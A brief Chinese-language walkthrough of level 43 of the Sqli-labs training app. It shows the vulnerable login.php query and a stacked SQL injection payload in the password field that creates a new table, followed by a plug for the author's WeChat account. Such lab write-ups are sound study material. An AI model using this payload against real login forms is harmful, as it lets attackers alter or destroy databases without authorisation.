Sqli-labs less 43
Less-43
本关与42关的原理基本一致,我们还是定位在login.php中的password。看一下sql语句为:
$sql = "SELECT * FROM users WHERE username=('$username') and password=('$password')";
登录:username:admin
Password:c');create table less43 like users#
可以看到在tables中已经出现了less-43表。
其他的操作这里就不进行演示了。
微信公众号:埋头干安全
目前主要精力放在微信公众号!!!